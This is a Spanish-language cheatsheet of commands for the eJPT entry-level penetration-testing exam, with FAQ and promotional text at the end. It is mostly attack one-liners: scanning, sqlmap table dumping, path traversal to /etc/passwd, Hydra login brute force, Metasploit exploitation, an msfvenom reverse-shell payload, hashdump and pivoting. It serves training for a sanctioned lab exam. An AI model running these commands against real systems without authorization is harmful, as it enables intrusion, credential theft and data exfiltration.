Cheatsheet eJPT 2026

Los comandos accesibles para principiantes del examen INE eLearnSecurity Junior Penetration Tester — descubrimiento de hosts, escaneo, enumeración, ataques web, Metasploit y pivoting básico. Sin informe, solo los fundamentos.

Actualizado:

Navegación rápida

01 Descubrimiento de hosts y Escaneo 02 Enumeración 03 Ataques Web 04 Explotación (Metasploit) 05 Post-Explotación y Pivoting 06 Consejos del Examen

# Descubrimiento de hosts y Escaneo

El eJPT empieza por encontrar hosts vivos y puertos abiertos. Domina nmap — es la herramienta más importante del examen.

nmap -sn 10.10.10.0/24
Ping sweep — descubre los hosts vivos en la subred
nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
Escaneo TCP completo de un host
nmap -p OPEN_PORTS -sC -sV TARGET
Detección de servicio/versión + scripts por defecto en los puertos abiertos
nmap -sU --top-ports 100 TARGET
No olvides UDP — SNMP, DNS y TFTP suelen esconderse aquí

# Enumeración

Responde a las preguntas del examen enumerando cada servicio. Usuarios, recursos, versiones y configuraciones: eso es lo que preguntan.

💡 Consejo eJPT: el examen se basa en preguntas — lee primero cada pregunta, luego enumera el servicio concreto al que apunta.
smbclient -N -L //TARGET ; enum4linux-ng -A TARGET
Lista recursos SMB (sesión nula) y enumeración SMB/RPC completa
snmpwalk -v2c -c public TARGET
SNMP walk con comunidad «public» — filtra usuarios, procesos, software
ftp TARGET # prueba anonymous / anonymous
Comprueba el acceso FTP anónimo
gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
Fuerza bruta de directorios para encontrar páginas web ocultas

# Ataques Web

El eJPT cubre las vulnerabilidades web básicas: inyección SQL, XSS y directory traversal. Burp Suite y sqlmap hacen el trabajo pesado.

sqlmap -u "http://TARGET/page.php?id=1" --batch --dbs
Inyección SQL automatizada — enumera las bases de datos
sqlmap -u "http://TARGET/page.php?id=1" --batch -D db -T users --dump
Vuelca una tabla — a menudo contiene la respuesta a una pregunta del examen
curl "http://TARGET/page?file=../../../../etc/passwd"
Directory traversal / LFI — lee archivos locales
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
Fuerza bruta de un formulario de login web con Hydra

# Explotación (Metasploit)

A diferencia de la OSCP, el eJPT fomenta Metasploit. Aprende el flujo de msfconsole — es tu principal herramienta de explotación.

💡 Consejo eJPT: Metasploit está totalmente permitido. Usa search, define RHOSTS/LHOST, luego run.
msfconsole -q ; search TYPE:exploit SERVICE
Lanza Metasploit y busca un módulo de exploit correspondiente
use exploit/MODULE ; set RHOSTS TARGET ; set LHOST YOUR_IP ; run
Configura y lanza un exploit para una sesión Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o shell.exe
Genera un payload Meterpreter para entrega manual
use exploit/multi/handler ; set PAYLOAD windows/meterpreter/reverse_tcp ; run
Recibe la conexión Meterpreter inversa

# Post-Explotación y Pivoting

Una vez tengas una sesión Meterpreter, recopila información y pivota hacia las subredes internas — un escenario clásico del eJPT.

getuid ; sysinfo ; hashdump
Meterpreter — identifica el usuario, el host y vuelca los hashes locales
run autoroute -s 192.168.1.0/24
Añade una ruta a través de la sesión para alcanzar una subred interna
use auxiliary/server/socks_proxy ; run # luego usa proxychains
Inicia un proxy SOCKS para pasar herramientas externas por el pivot
proxychains4 nmap -sT -Pn -p 445,3389 192.168.1.10
Escanea la red interna a través del pivot

# Consejos del Examen eJPT

Estrategia para el examen accesible y basado en preguntas.

❓ Lee primero las preguntas: el examen es dinámico y basado en preguntas — cada una te dice exactamente qué buscar. Enumera con la pregunta en mente.
🧰 Usa Metasploit libremente: a diferencia de la OSCP, se fomenta. Aprende el search de msfconsole, las sesiones y autoroute.
🔎 Enumera todo: la mayoría de las respuestas incorrectas vienen de un servicio omitido. Escanea todos los puertos, revisa UDP, lee los banners.
🗺️ Practica el pivoting: la red del examen tiene hosts internos — practica autoroute y proxychains antes del examen.
📄 Sin informe: a diferencia de OSCP/CPTS/PNPT, no redactas informe — céntrate por completo en encontrar las respuestas.

❓ Preguntas frecuentes eJPT

El eJPT de INE es un examen 100% práctico y accesible para principiantes. Dispones de unas 48 horas en un laboratorio en vivo y respondes a un conjunto de preguntas de opción múltiple encontrando flags e información en la red objetivo. No hay informe escrito.

No. A diferencia de la OSCP, la CPTS o el PNPT, el eJPT no requiere un informe profesional. Es un examen dinámico basado en preguntas: explotas el laboratorio y respondes preguntas de opción múltiple. Una de las certificaciones prácticas más accesibles para principiantes.

Sí — el eJPT es ampliamente considerado la mejor certificación de pentest práctica de nivel inicial. Asume poca experiencia y se acompaña del curso Penetration Testing Student (PTS) de INE. Cubre los fundamentos: escaneo, enumeración, ataques web, Metasploit y pivoting básico.

Sí — Metasploit está totalmente permitido e incluso se fomenta. A diferencia de la OSCP (que lo limita a una máquina), el eJPT espera que uses Metasploit y Meterpreter para la explotación, el pivoting (autoroute/socks) y la post-explotación.

La mayoría de los candidatos necesitan de 1 a 3 meses. Completar la ruta Penetration Testing Student (PTS) de INE y practicar con máquinas principiantes de HackTheBox y TryHackMe basta para que la mayoría apruebe.

El eJPT se centra en los fundamentos de red y web e incluye pivoting básico (enrutar a través de un host comprometido para alcanzar una subred interna). No es un examen muy orientado a Active Directory como la CPTS o el PNPT.

Haz el eJPT primero. Es la certificación de nivel inicial que construye los fundamentos (escaneo, enumeración, explotación, pivoting básico) sin informe ni buffer overflow. La OSCP es un salto grande. eJPT → OSCP/CPTS es un recorrido común.

Sí. INE suele incluir un reintento gratuito con el voucher, y el examen está pensado para ser accesible a principiantes. Consulta la política actual de INE para los detalles exactos antes de programar.

nmap para el escaneo, gobuster/dirb y Burp Suite para web, sqlmap para inyección SQL, Metasploit/Meterpreter para explotación y pivoting, hydra para fuerza bruta, y herramientas básicas de enumeración (enum4linux, smbclient). Los fundamentos importan más que las herramientas avanzadas.

Sí — como acelerador de aprendizaje. El mapa mental gratuito organiza 12.020+ comandos por todos los dominios del eJPT (escaneo, enumeración, web, Metasploit, pivoting) con búsqueda instantánea, para que los principiantes encuentren rápido el comando correcto. Respeta siempre las reglas de tu examen.

📚 Recursos relacionados

Prepara tu eJPT con 12.020+ comandos

Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías con búsqueda instantánea — perfecto para encontrar rápido el comando correcto durante tu preparación del eJPT.

Empezar gratis →
📎 ¿Te ha resultado útil esta cheatsheet?